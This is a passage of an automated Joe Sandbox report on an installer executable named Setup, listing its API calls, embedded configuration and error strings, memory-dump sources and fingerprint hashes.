                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C945698
                                                              • PathIsRelativeW.SHLWAPI(00000000,?), ref: 6C945735
                                                              • PathFileExistsW.SHLWAPI(00000001,?), ref: 6C9457C3
                                                              Strings
                                                              • pLocalPath is NULL!!!!!!, xrefs: 6C94585B
                                                              • Package authoring error. The Url for this item is not authored and the item does not exist locally: , xrefs: 6C9457FB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Path$ExistsFileH_prolog3Relative
                                                              • String ID: Package authoring error. The Url for this item is not authored and the item does not exist locally: $pLocalPath is NULL!!!!!!
                                                              • API String ID: 1035510722-3253188715
                                                              • Opcode ID: e1b9fbfb78e4718b8743db916b05e1106457ebb3ce85979047f4a9b82abf5e03
                                                              • Instruction ID: ccaad15fe044aac28962a97a985f3ead4455dc2ab3aac34869e2dcc37b7552b7
                                                              • Opcode Fuzzy Hash: e1b9fbfb78e4718b8743db916b05e1106457ebb3ce85979047f4a9b82abf5e03
                                                              • Instruction Fuzzy Hash: FC51B471901109EFDB10DFE8C8449EE7BB8AF26358F148166E514EBB91D730DE49CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C923487
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9233F7: __EH_prolog3.LIBCMT ref: 6C9233FE
                                                                • Part of subcall function 6C9189B7: __EH_prolog3.LIBCMT ref: 6C9189BE
                                                                • Part of subcall function 6C9189B7: __CxxThrowException@8.LIBCMT ref: 6C918A89
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Delay$ItemRef$Limit$Retry
                                                              • API String ID: 2489616738-1309351307
                                                              • Opcode ID: 69f5e156a1a0f7ee55e755138dce2a7436c11b3b33a1681f7fdf678398d9029b
                                                              • Instruction ID: a69db6ce9e1735884effc9c4e1a4850643b594609b46623169caf460bef841aa
                                                              • Opcode Fuzzy Hash: 69f5e156a1a0f7ee55e755138dce2a7436c11b3b33a1681f7fdf678398d9029b
                                                              • Instruction Fuzzy Hash: 6E515E71A10209EFDF00CFB8C945AAEBBB9BF25308F244459E458EBB80D735DA05CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C920E9D
                                                                • Part of subcall function 6C918B9F: __EH_prolog3.LIBCMT ref: 6C918BA6
                                                              • __CxxThrowException@8.LIBCMT ref: 6C921011
                                                              Strings
                                                              • schema validation failure: , xrefs: 6C920F73
                                                              • ParameterInfo.xml, xrefs: 6C920F63
                                                              • must have exactly 2 child nodes, xrefs: 6C920F88
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: must have exactly 2 child nodes$ParameterInfo.xml$schema validation failure:
                                                              • API String ID: 2489616738-936724439
                                                              • Opcode ID: 8cea0e27fc629df51b3c0e7206f596d6a04a3bc781d248d7f92d7264b3309570
                                                              • Instruction ID: 584b9591381473dfa7ae9bf842c81e5ccc0acbde79d06000c438f8aa40da8f51
                                                              • Opcode Fuzzy Hash: 8cea0e27fc629df51b3c0e7206f596d6a04a3bc781d248d7f92d7264b3309570
                                                              • Instruction Fuzzy Hash: 4B51AF71901248AFDB14CFE8C955BEEBBB8AF25318F148559E015DBB80CB31DA05CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9211FD
                                                                • Part of subcall function 6C918B9F: __EH_prolog3.LIBCMT ref: 6C918BA6
                                                              • __CxxThrowException@8.LIBCMT ref: 6C92132C
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C9212AD
                                                              • Not, xrefs: 6C921240
                                                              • schema validation failure: Not must have exactly 1 child node, xrefs: 6C92129F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Not$ParameterInfo.xml$schema validation failure: Not must have exactly 1 child node
                                                              • API String ID: 2489616738-1102589135
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9231C9
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: CommandLine$ItemRef$LogFile$Name
                                                              • API String ID: 431132790-1099889147
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C95988C: __EH_prolog3.LIBCMT ref: 6C959893
                                                                • Part of subcall function 6C95988C: GetCommandLineW.KERNEL32(0000002C,6C95D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9598B4
                                                                • Part of subcall function 6C95988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C95996E
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                                • Part of subcall function 6C9257E5: __EH_prolog3.LIBCMT ref: 6C9257EC
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                                • Part of subcall function 6C91A8CC: SetFilePointer.KERNEL32(?,00000000,6C90A794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 6C91AA49
                                                                • Part of subcall function 6C91A8CC: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91AA97
                                                                • Part of subcall function 6C91A8CC: SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C91AAAC
                                                              • SysFreeString.OLEAUT32(?), ref: 6C92578A
                                                              • SysFreeString.OLEAUT32(?), ref: 6C925799
                                                              • SysFreeString.OLEAUT32(?), ref: 6C9257C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3String$FileFree$PathRelative$AllocCommandException@8LineModuleNamePointerReadThrow_memcpy_s
                                                              • String ID: ParameterInfo.xml$UiInfo.xml
                                                              • API String ID: 3873923459-386449131
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C925044: __EH_prolog3.LIBCMT ref: 6C92504B
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • GetCommandLineW.KERNEL32(?,?,?,?,512AC3CC,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?,6C90A794), ref: 6C9597B2
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                              • SysFreeString.OLEAUT32(?), ref: 6C95985E
                                                                • Part of subcall function 6C924798: __EH_prolog3.LIBCMT ref: 6C92479F
                                                                • Part of subcall function 6C9250D5: __EH_prolog3_catch.LIBCMT ref: 6C9250DC
                                                                • Part of subcall function 6C9250D5: CoInitialize.OLE32(00000000), ref: 6C92512A
                                                                • Part of subcall function 6C9250D5: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,00000738,?,?,?,00000000,?,?,?,512AC3CC,?,?,?), ref: 6C925148
                                                                • Part of subcall function 6C9250D5: CoUninitialize.OLE32(02642228,?,succeeded,?,?,?,00000000,?,?,?,512AC3CC,?,?,?), ref: 6C9251E6
                                                              • SysFreeString.OLEAUT32(?), ref: 6C959818
                                                              • SysFreeString.OLEAUT32(?), ref: 6C959833
                                                              Strings
                                                              • Loading localized engine data for language %d from %s, xrefs: 6C95977B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrowUninitialize
                                                              • String ID: Loading localized engine data for language %d from %s
                                                              • API String ID: 509998568-3315213612
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9219B4
                                                                • Part of subcall function 6C918B9F: __EH_prolog3.LIBCMT ref: 6C918BA6
                                                              • __CxxThrowException@8.LIBCMT ref: 6C921ADE
                                                              Strings
                                                              • schema validation failure: , xrefs: 6C921A40
                                                              • can only have one logical or arithmietic expression for a child node, xrefs: 6C921A54
                                                              • ParameterInfo.xml, xrefs: 6C921902, 6C921A2F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: can only have one logical or arithmietic expression for a child node$ParameterInfo.xml$schema validation failure:
                                                              • API String ID: 2489616738-4045823434
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C921C35
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9219AD: __EH_prolog3.LIBCMT ref: 6C9219B4
                                                                • Part of subcall function 6C9219AD: __CxxThrowException@8.LIBCMT ref: 6C921ADE
                                                                • Part of subcall function 6C918AAC: __EH_prolog3.LIBCMT ref: 6C918AB3
                                                                • Part of subcall function 6C918AAC: __CxxThrowException@8.LIBCMT ref: 6C918B39
                                                                • Part of subcall function 6C9192D1: __EH_prolog3.LIBCMT ref: 6C9192D8
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C921D02
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                              • String ID: IsPresent$ParameterInfo.xml$schema validation failure: IsPresent can only be authored once.
                                                              • API String ID: 2724732616-4158871691
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9219AD: __EH_prolog3.LIBCMT ref: 6C9219B4
                                                                • Part of subcall function 6C9219AD: __CxxThrowException@8.LIBCMT ref: 6C921ADE
                                                                • Part of subcall function 6C918AAC: __EH_prolog3.LIBCMT ref: 6C918AB3
                                                                • Part of subcall function 6C918AAC: __CxxThrowException@8.LIBCMT ref: 6C918B39
                                                                • Part of subcall function 6C9192D1: __EH_prolog3.LIBCMT ref: 6C9192D8
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                              • String ID: ApplicableIf$ParameterInfo.xml$schema validation failure: IsPresent can only be authored once.
                                                              • API String ID: 2724732616-3920316726
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _malloc.LIBCMT ref: 6C4AD771
                                                                • Part of subcall function 6C4A8FCB: __FF_MSGBANNER.LIBCMT ref: 6C4A8FE4
                                                                • Part of subcall function 6C4A8FCB: __NMSG_WRITE.LIBCMT ref: 6C4A8FEB
                                                                • Part of subcall function 6C4A8FCB: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,6C4A91D6,?), ref: 6C4A9010
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_malloc
                                                              • String ID: Q~Kl
                                                              • API String ID: 501242067-1527990588
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 6C95365F
                                                              • GetLastError.KERNEL32 ref: 6C953669
                                                                • Part of subcall function 6C917479: __EH_prolog3.LIBCMT ref: 6C917480
                                                              • GetLastError.KERNEL32 ref: 6C95368B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CheckH_prolog3MembershipToken
                                                              • String ID: AllocateAndInitializeSid$CheckTokenMembership
                                                              • API String ID: 3752544998-2579124284
                                                              • Opcode ID: 7121ff14211efe2a733891b06e8ebd7718ca8ae97f1f106287a9d5ecda9e128a
                                                              • Instruction ID: 677ee4b2d9b76812a69cb73b0ef86820bd3dbaab202ae80e03345b05de5a7476
                                                              • Opcode Fuzzy Hash: 7121ff14211efe2a733891b06e8ebd7718ca8ae97f1f106287a9d5ecda9e128a
                                                              • Instruction Fuzzy Hash: 45117C74B00209EFDB04DFA5C98AC6EBBB9FF58314B51096DE456A3680DB70E900CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49D07A
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 6C49D130
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              Strings
                                                              • IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S, xrefs: 6C49D0BF
                                                              • IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT, xrefs: 6C49D0A3
                                                              • IDS_INSTALL_WARNING_DESCRIPTION_FORMAT, xrefs: 6C49D0F4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ItemText
                                                              • String ID: IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S$IDS_INSTALL_WARNING_DESCRIPTION_FORMAT$IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT
                                                              • API String ID: 2878149499-3033223209
                                                              • Opcode ID: 5afeb97b36aae620d974753afa16b33b982a7246f7ace3eb5d77e23feb3355d9
                                                              • Instruction ID: 8dfeb6bc36bf7775ee189806ca06ebd02896db66744a42488de4093009ec81c2
                                                              • Opcode Fuzzy Hash: 5afeb97b36aae620d974753afa16b33b982a7246f7ace3eb5d77e23feb3355d9
                                                              • Instruction Fuzzy Hash: 17217C31904549DFDB00EBE4C949EAEBBF2BF46308F18445CE056AB791DB30E909CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49CFAC
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • GetDlgItem.USER32(?,00000067), ref: 6C49D018
                                                                • Part of subcall function 6C48E2E1: GetCurrentProcess.KERNEL32(00000000,0000000D,?,?,6C49DFD0,00000000), ref: 6C48E319
                                                                • Part of subcall function 6C48E2E1: FlushInstructionCache.KERNEL32(00000000,?,?,6C49DFD0,00000000), ref: 6C48E320
                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6C49D041
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 6C49D05A
                                                              Strings
                                                              • IDS_BLOCK_DIALOGS_SYSLINK_TEXT, xrefs: 6C49CFB5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Item$CacheCurrentFlushInstructionLongProcessTextWindow
                                                              • String ID: IDS_BLOCK_DIALOGS_SYSLINK_TEXT
                                                              • API String ID: 2244164258-355004722
                                                              • Opcode ID: 72f5a4c82f0d175012f9577f6ee7c4ee2c28acefb6039cf5574ec56ddc841cae
                                                              • Instruction ID: 0b0612c48b658bf2c0b4571330c3a719bd0d2f8d003cf9dcfd974cc50781e8a7
                                                              • Opcode Fuzzy Hash: 72f5a4c82f0d175012f9577f6ee7c4ee2c28acefb6039cf5574ec56ddc841cae
                                                              • Instruction Fuzzy Hash: E6217A71901216DFDF10DFA8C848EAEBBF5BF05318B144558E865EB7A1DB30E909CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9258FC
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • StrPBrkW.SHLWAPI(00000000,) <>",#(loc.,?,6C94FA6E,6C94FA6E,00000718,02642228,?,00000000,00000010,6C926171,00000000,00000748,?,ParameterInfo.xml), ref: 6C925972
                                                              • SysFreeString.OLEAUT32(6C94FA6E), ref: 6C9259A3
                                                                • Part of subcall function 6C968C9E: _memcpy_s.LIBCMT ref: 6C968CE4
                                                              Strings
                                                              Memory Dump Source
